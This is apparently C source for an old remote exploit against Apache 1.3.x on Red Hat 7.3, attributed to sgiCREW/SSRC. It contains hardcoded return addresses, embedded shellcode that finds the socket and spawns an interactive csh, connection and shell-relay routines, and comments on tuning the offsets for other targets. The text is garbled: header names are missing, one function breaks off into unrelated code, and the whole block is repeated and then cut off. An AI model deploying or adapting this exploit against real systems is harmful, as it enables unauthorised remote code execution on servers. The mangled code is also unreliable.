/* SSRC ( sgiCREW Security Research Center) * This is just proof of concept code. * At the most cases it will not work. Probably you'll exploit some redhats but * the main functions of this code are not ready for the public yet! * apache 1.3.23 (default redhat 7.3 installation) [ successed with this code ] * linux/x86 apache <= 1.3.23 [ ohh... forget it for now. you'll need brute force * method for the offset and retaddr. Not supported by this code version ] * yellow dog linux/ppc apache <= 1.3.24 [ should work. ] * look into your error_log file * if exploitatation is not sucessful you will recieve: * [notice] ... exit signal Segmentation fault ... * Then try with different offset. * The retaddr. is fixed for redhat 7.3 so you will not have any problems. * It should work with other apache versions... So go to play * with objdump. * version 0.1.2 * thanks to: * hsj and jetli * private! private! * brought to you by ssrc */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define OFFSET 0xfbd8888a // blah is that correct? // yes... for redhat 7.3 #define RET 0x0808528c // should work. play with objdump if you need // other retaddr. so the code will work against // other linux distr. and apache versions #define RET_OFF 914 #define NOP 0x41 #define PORT_OFF 46 /* heh linux find socket shellcode in 400 bytes. pretty nice isn't it */ char shellcode[] = "\xeb\x39\x5e\x8d\x46\x0c\x89\x46\x04\x89\xc7\x8d\x46\x1c\x89\x46" "\x08\x31\xdb\xb3\x10\x89\x18\x31\xc9\xb1\xff\x31\xc0\x89\xca\x89" "\x0e\xb0\x66\xb3\x07\x89\xf1\xcd\x80\x89\xd1\x85\xc0\x75\x08\x66" "\x81\x7f\x02\x34\x12\x74\x06\xe2\xe2\xeb\x45\xeb\x4a\x89\xcb\x31" "\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\xc7\x06\x2f" "\x62\x69\x6e\xc7\x46\x04\x2f\x63\x73\x68\xc7\x46\x0c\x2d\x69\x41" "\x41\x89\x76\x10\x8d\x46\x0c\x89\x46\x14\x8d\x4e\x10\x8d\x56\x18" "\x31\xc0\x89\x02\x89\x46\x08\x88\x46\x0e\x89\xf3\xb0\x0b\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x76\xff\xff\xff"; int make_connection(char *address,int port) { struct sockaddr_in server,target; struct hostent *host; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&server,0,sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = 0; if(bind(s,(struct sockaddr *)&server,sizeof(server))<0) { close(s); return -2; } target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==-1) { host = gethostbyname(address); if(host==0) { close(s); return -3; } memcpy(&(target.sin_addr),*(host->h_addr_list),host->h_length); } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -4; } if(i==0) { close(s); return -5; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); errno = bf; return -6; } ioctl(s,FIONBIO,&bf); return s; } int sh(int in,int out,int s) { char sbuf[128],rbuf[128]; int i,ti,fd_cnt,ret=0,slen=0,rlen=0; fd_set rd,wr; fd_cnt = in > out ? in : out; fd_cnt = s > fd_cnt ? s : fd_cnt; fd_cnt++; for(;;) { FD_ZERO(&rd); if(rlen>(i*8))&0xff)=='\r')||(((RET>>(i*8))&0xff)=='\n')) break; } if(i!=4) { fprintf(stderr,"bad ret-addr.\n"); return -1; } if(!(p=malloc((sizeof(buf)+sizeof(buf2)+32)*32+1024))) { fprintf(stderr,"can not alloc memory.\n"); return -2; } sock = make_connection(argv[1],atoi(argv[2])); if(sock<0) { fprintf(stderr,"can not connect to %s.\n",argv[1]); return -3; /* SSRC ( sgiCREW Security Research Center) * This is just proof of concept code. * At the most cases it will not work. Probably you'll exploit some redhats but * the main functions of this code are not ready for the public yet! * apache 1.3.23 (default redhat 7.3 installation) [ successed with this code ] * linux/x86 apache <= 1.3.23 [ ohh... forget it for now. you'll need brute force * method for the offset and retaddr. Not supported by this code version ] * yellow dog linux/ppc apache <= 1.3.24 [ should work. ] * look into your error_log file * if exploitatation is not sucessful you will recieve: * [notice] ... exit signal Segmentation fault ... * Then try with different offset. * The retaddr. is fixed for redhat 7.3 so you will not have any problems. * It should work with other apache versions... So go to play * with objdump. * version 0.1.2 * thanks to: * hsj and jetli * private! private! * brought to you by ssrc */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define OFFSET 0xfbd8888a // blah is that correct? // yes... for redhat 7.3 #define RET 0x0808528c // should work. play with objdump if you need // other retaddr. so the code will work against // other linux distr. and apache versions #define RET_OFF 914 #define NOP 0x41 #define PORT_OFF 46 /* heh linux find socket shellcode in 400 bytes. pretty nice isn't it */ char shellcode[] = "\xeb\x39\x5e\x8d\x46\x0c\x89\x46\x04\x89\xc7\x8d\x46\x1c\x89\x46" "\x08\x31\xdb\xb3\x10\x89\x18\x31\xc9\xb1\xff\x31\xc0\x89\xca\x89" "\x0e\xb0\x66\xb3\x07\x89\xf1\xcd\x80\x89\xd1\x85\xc0\x75\x08\x66" "\x81\x7f\x02\x34\x12\x74\x06\xe2\xe2\xeb\x45\xeb\x4a\x89\xcb\x31" "\xc9\xb1\x03\x31\xc0\xb0\x3f\x49\xcd\x80\x41\xe2\xf6\xc7\x06\x2f" "\x62\x69\x6e\xc7\x46\x04\x2f\x63\x73\x68\xc7\x46\x0c\x2d\x69\x41" "\x41\x89\x76\x10\x8d\x46\x0c\x89\x46\x14\x8d\x4e\x10\x8d\x56\x18" "\x31\xc0\x89\x02\x89\x46\x08\x88\x46\x0e\x89\xf3\xb0\x0b\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x76\xff\xff\xff"; int make_connection(char *address,int port) { struct sockaddr_in server,target; struct hostent *host; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; memset((char *)&server,0,sizeof(server)); server.sin_family = AF_INET; server.sin_addr.s_addr = htonl(INADDR_ANY); server.sin_port = 0; if(bind(s,(struct sockaddr *)&server,sizeof(server))<0) { close(s); return -2; } target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==-1) { host = gethostbyname(address); if(host==0) { close(s); return -3; } memcpy(&(target.sin_addr),*(host->h_addr_list),host->h_length); } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = 30; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -4; } if(i==0) { close(s); return -5; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); errno = bf; return -6; } ioctl(s,FIONBIO,&bf); return s; } int sh(int in,int out,int s) { char sbuf[128],rbuf[128]; int i,ti,fd_cnt,ret=0,slen=0,rlen=0; fd_set rd,wr; fd_cnt = in > out ? in : out; fd_cnt = s > fd_cnt ? s : fd_cnt; fd_cnt++; for(;;) { FD_ZERO(&rd); if(rlen>(i*8))&0xff)=='\r')||(((RET>>(i*8))&0xff)=='\n')) break; } if(i!=4) { fprintf(stderr,"bad ret-addr.\n"); return -1; } if(!(p=malloc((sizeof(buf)+sizeof(buf2)+32)*32+1024))) { fprintf(stderr,"can not alloc memory.\n"); return -2; } sock = make_connection(argv[1],atoi(argv[2])); if(sock<0) { fprintf(stderr,"can not connect to %s.\n",argv[1]);